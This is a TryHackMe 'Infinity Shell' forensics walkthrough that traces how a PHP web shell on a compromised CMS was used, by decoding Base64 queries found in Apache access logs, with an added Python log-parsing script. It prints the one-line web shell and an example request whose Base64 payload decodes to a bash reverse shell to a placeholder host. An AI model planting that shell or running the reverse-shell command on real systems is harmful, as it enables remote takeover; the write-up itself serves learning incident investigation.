Challenges: Infinity Shell (TryHackMe)


The Infinity Shell forensics challenge focuses on investigating a compromised web server that had been exploited by attackers. Instead of the usual network scans and web enumeration, the challenge requires digging into the server's file structure and log files to trace attacker activity. The attackers had uploaded a PHP-based web shell capable of executing Base64-encoded commands, and the task is to reconstruct how it was used and ultimately extract the flag from their activity.
Set up your virtual environment
To successfully complete this room, you'll need to set up your virtual environment. This involves starting the Target Machine, ensuring you're equipped with the necessary tools and access to tackle the challenges ahead.
Cipher’s legion of bots has exploited a known vulnerability in our web application, leaving behind a dangerous web shell implant. Investigate the breach and trace the attacker's footsteps!
Note: Click the Start Machine button to spawn the Virtual Machine.
Answer the questions below
What is the flag?
I tried doing basic enumeration using tools like nmap and gobuster and visiting the site, but none of it was a success. I got a 405 on the site, which led me to conclude that maybe they didn't anticipate us using these tools or accessing the site that much.
Later I looked for hints in other walkthroughs and learned that there's a CMS site within /var/www/html.
The CMS has an img folder containing an images.php file with the following contents:
<?php system(base64_decode($_GET['query'])); ?>
Understanding how the PHP Web Shell Executes Base64-Encoded Commands
I had to ask ChatGPT what this code does, since I'm still learning, and how we ended up getting the Base64 hash in the logs that helped us get the flag.
What does this PHP code do?
<?php system(base64_decode($_GET['query'])); ?>
- $_GET['query'] → takes a value from the query string (like ?query=abc123)
- base64_decode() → decodes that value from Base64
- system() → executes the decoded value as an OS command
Why look in /var/log?
Web servers log every request. Apache or Nginx keeps logs (usually in /var/log/apache2/access.log or /var/log/nginx/access.log). The attacker would need to trigger this file with something like:
http://<server>/CMSsite-master/img/images.php?query=YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eDo4MDgwID4mMQ==
That Base64 payload gets recorded in the access logs because the request line, including the query string, is logged by default.
Hence, the forensic logic:
- Look at how attackers interacted with the web shell → access logs
- Extract the query parameter from the logs → it's Base64 encoded → decode it → find out what commands they executed.
So the hint came from the code itself, which tells us how attackers interacted:
- Only one entry point: images.php?query=...
- Payloads must be Base64
In real-world forensic thinking:
- If an RCE was discovered, logs are your timeline of attacker activity.
Logs
I had to check /var/log/apache for the site's log files.
I used cat other_vhosts_access.log.1 and had to scroll a lot before I found the Base64 query hash. If you'll be following this, you can use either of these commands instead:
cat other_vhosts_access.log.1 | grep "images.php"
grep "images.php" other_vhosts_access.log.1
I used the Base64Decode site to decode the Base64 hash.
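As an added example (not part of the original writeup or the room), here is a small Python script that automates the same step: it pulls every request to images.php out of Apache access-log lines in the other_vhosts_access.log format, extracts the query parameter and Base64-decodes it, so the attacker's commands are listed with source IP and timestamp. The log lines are constructed samples, and lines whose query is not valid Base64 are reported rather than silently skipped.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache's other_vhosts_access.log format
# ("vhost:port" prefix followed by the combined log format); not from the room.
SAMPLE_LOG = """\
localhost:80 10.0.2.15 - - [05/Mar/2025:10:12:01 +0000] "GET /CMSsite-master/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
localhost:80 10.0.2.99 - - [05/Mar/2025:10:13:44 +0000] "GET /CMSsite-master/img/images.php?query=aWQ= HTTP/1.1" 200 61 "-" "curl/7.88.1"
localhost:80 10.0.2.99 - - [05/Mar/2025:10:14:02 +0000] "GET /CMSsite-master/img/images.php?query=dW5hbWUgLWE%3D HTTP/1.1" 200 120 "-" "curl/7.88.1"
localhost:80 10.0.2.99 - - [05/Mar/2025:10:14:30 +0000] "GET /CMSsite-master/img/images.php?query=notbase64!! HTTP/1.1" 500 0 "-" "curl/7.88.1"
"""

# Optional "vhost:port " prefix, then client IP, timestamp and the request line.
LOG_RE = re.compile(
    r'^(?:\S+:\d+\s+)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

def decode_query(value):
    """Base64-decode one query value; return None if it is not valid Base64."""
    try:
        raw = base64.b64decode(value, validate=True)
        return raw.decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None

def extract_shell_commands(log_text, shell_path="/img/images.php", param="query"):
    """Return (ip, timestamp, decoded_command) for every web-shell hit in the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith(shell_path):
            continue
        # parse_qs percent-decodes the value, so an encoded %3D becomes '='
        for value in parse_qs(url.query).get(param, []):
            cmd = decode_query(value)
            label = cmd if cmd is not None else f"<not valid Base64: {value}>"
            hits.append((m.group("ip"), m.group("ts"), label))
    return hits

if __name__ == "__main__":
    for ip, ts, cmd in extract_shell_commands(SAMPLE_LOG):
        print(f"{ts}  {ip}  {cmd!r}")
```

Point it at the real file with `extract_shell_commands(open("other_vhosts_access.log.1").read())` to get the full timeline of decoded commands instead of scrolling through the raw log.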
This challenge was a valuable exercise in understanding how attackers leverage simple PHP web shells and how their activity can still be traced through web server logs. By identifying the malicious images.php file, understanding its behavior, and reviewing Apache access logs, we could reconstruct the commands executed by the attacker. This reinforces an important forensic principle: even when attackers attempt to hide their actions, server logs often provide the evidence needed to uncover their activities.
Written by Jebitok